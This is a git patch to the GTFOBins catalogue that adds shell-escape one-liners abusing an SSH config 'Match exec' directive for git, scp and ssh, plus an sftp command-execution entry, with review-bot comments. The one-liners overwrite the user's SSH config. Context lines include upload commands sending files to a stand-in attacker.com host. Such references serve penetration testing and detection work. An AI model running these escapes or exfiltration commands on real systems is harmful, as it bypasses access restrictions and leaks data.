From c0de447727a5c65e1714d6e06250d11047b05003 Mon Sep 17 00:00:00 2001
From: IgnifexLabs
Date: Thu, 12 Mar 2026 16:26:49 +0100
Subject: [PATCH] Included 4 new methods for generating a shell. all related to the misuse of ssh config file. It has been tested on git, scp, sftp and ssh
---
 _gtfobins/git | 7 +++++++
 _gtfobins/scp | 7 +++++++
 _gtfobins/sftp | 8 ++++++++
 _gtfobins/ssh | 7 +++++++
 4 files changed, 29 insertions(+)
diff --git a/_gtfobins/git b/_gtfobins/git
index b4d04158..37e1ff28 100644
--- a/_gtfobins/git
+++ b/_gtfobins/git
@@ -66,4 +66,11 @@ functions:
 git --exec-path=. x -p
 shell: false
 unprivileged:
+ - code: |-
+ echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; GIT_SSH_COMMAND="ssh -F ~/.ssh/config" git clone user@host:repo.git
+ comment: |-
+ Spawns the shell on the client, doesn't have to be the official config file location
+ contexts:
+ sudo:
+ unprivileged:
 ...
diff --git a/_gtfobins/scp b/_gtfobins/scp
index f494909f..e676f16d 100644
--- a/_gtfobins/scp
+++ b/_gtfobins/scp
@@ -25,6 +25,13 @@ functions:
 suid:
 shell: true
 unprivileged:
+ - code: |-
+ echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; scp -F ~/.ssh/config localhost:~/.ssh/config localhost
+ comment: |-
+ Spawns the shell on the client, doesn't have to be the official config file location
+ contexts:
+ sudo:
+ unprivileged:
 upload:
 - code: |-
 scp /path/to/input-file user@attacker.com:/path/to/output-file
diff --git a/_gtfobins/sftp b/_gtfobins/sftp
index 9ef28bff..3eefd0d8 100644
--- a/_gtfobins/sftp
+++ b/_gtfobins/sftp
@@ -29,4 +29,12 @@ functions:
 suid:
 unprivileged:
 receiver: ssh-server
+ command:
+ - code: |-
+ sftp -D /usr/bin/nautilus localhost
+ comment: |-
+ Executes the command provided you don't need to provide the whole path.
+ contexts:
+ sudo:
+ unprivileged:
 ...
diff --git a/_gtfobins/ssh b/_gtfobins/ssh
index 5142bb9e..99ddab73 100644
--- a/_gtfobins/ssh
+++ b/_gtfobins/ssh
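Review bot: In `_gtfobins/git` the added `code` line redirects into `"$HOME/.ssh/config"`, which truncates the user's real SSH client configuration, even though the `comment` says the file does not have to be at the official location; the same line is repeated in the `scp` and `ssh` hunks. Writing to a placeholder path and passing it to `-F` would match the comment and leave the existing config intact, for example `echo 'Match exec "/bin/sh 0<&2 1>&2"' > /path/to/config; GIT_SSH_COMMAND="ssh -F /path/to/config" git clone user@host:repo.git`. The line also names the same file once as `$HOME/...` and once as `~/...` inside a quoted string, and the two may resolve differently once the entry is run in the `sudo` context. The comment could also state that the trigger is a `Match exec` directive in a client config selected through `-F` or `GIT_SSH_COMMAND`, since that is what command-line and file-integrity monitoring would key on.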
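Review bot: The operands in the added `_gtfobins/scp` line, `localhost:~/.ssh/config localhost`, are not explained by the copied `comment`, and the second operand is a local file name rather than a host, so if the copy completes it would presumably leave a file called `localhost` in the working directory. The existing `upload` entry in the same hunk uses `/path/to/...` and `user@...` placeholders; the new entry would read more clearly with that convention, e.g. `scp -F /path/to/config user@host:/path/to/input-file /path/to/output-file`. The comment should also say that the shell comes from the config directive and not from the transfer, so readers do not attribute it to the operands.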
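Review bot: The `comment` added in `_gtfobins/sftp` says the whole path need not be provided, yet the example passes the absolute path `/usr/bin/nautilus`, and the sentence runs two clauses together without punctuation. `nautilus` is a desktop file manager that many hosts will not have installed, so a neutral placeholder such as `sftp -D /path/to/command` would fit the convention of the other entries; with `-D` the client talks to a local program instead of going through ssh, so the trailing `localhost` looks unnecessary and is worth confirming. Suggested wording, if the PATH lookup the author describes is verified: `Executes the given command in place of the SFTP server program. A bare command name is enough; the full path is not required.` The commit subject also counts this as a shell method while the entry is filed under `command:`.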
@@ -38,6 +38,13 @@ functions:
 contexts:
 sudo:
 unprivileged:
+ - code: |-
+ echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; ssh -F ~/.ssh/config localhost
+ comment: |-
+ Spawns the shell on the client, doesn't have to be the official config file location
+ contexts:
+ sudo:
+ unprivileged:
 upload:
 - code: |-
 echo DATA | ssh user@attacker.com 'cat >/path/to/output-file"